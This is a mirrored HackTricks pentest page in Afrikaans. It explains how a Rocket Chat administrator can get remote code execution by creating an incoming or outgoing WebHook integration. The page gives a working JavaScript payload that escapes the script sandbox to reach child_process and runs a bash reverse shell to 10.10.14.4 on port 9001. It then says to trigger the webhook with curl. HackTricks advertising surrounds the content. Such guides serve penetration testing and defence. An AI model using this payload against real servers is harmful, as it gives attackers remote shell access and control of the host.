mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 22:18:27 +00:00
4 KiB
4 KiB
Rocket Chat
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS Familie, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PRs in te dien by die HackTricks en HackTricks Cloud github-opslag.
![](/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif)
{% embed url="https://websec.nl/" %}
RCE
As jy 'n admin binne Rocket Chat is, kan jy RCE kry.
- Gaan na
Integrations
en kiesNuwe Integrasi
en kies enigeen:Incoming WebHook
ofOutgoing WebHook
. /admin/integrations/incoming
![](/Mirrors/hacktricks/media/commit/2a51736f49a975a1b778d4f34cb48635fabf1446/.gitbook/assets/image%20%28263%29.png)
- Volgens die dokumentasie, gebruik albei ES2015 / ECMAScript 6 (basies JavaScript) om die data te verwerk. So laat ons 'n rev shell vir javascript kry soos:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Stel die WebHook in (die kanaal en pos as gebruikersnaam moet bestaan):
![](/Mirrors/hacktricks/media/commit/2a51736f49a975a1b778d4f34cb48635fabf1446/.gitbook/assets/image%20%28902%29.png)
- Stel WebHook-skrip in:
![](/Mirrors/hacktricks/media/commit/2a51736f49a975a1b778d4f34cb48635fabf1446/.gitbook/assets/image%20%28569%29.png)
- Stoor veranderinge
- Kry die gegenereerde WebHook URL:
![](/Mirrors/hacktricks/media/commit/2a51736f49a975a1b778d4f34cb48635fabf1446/.gitbook/assets/image%20%28934%29.png)
- Roep dit aan met curl en jy behoort die rev shell te ontvang
![](/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif)
{% embed url="https://websec.nl/" %}
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS-familie, ons versameling eksklusiewe NFT's
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.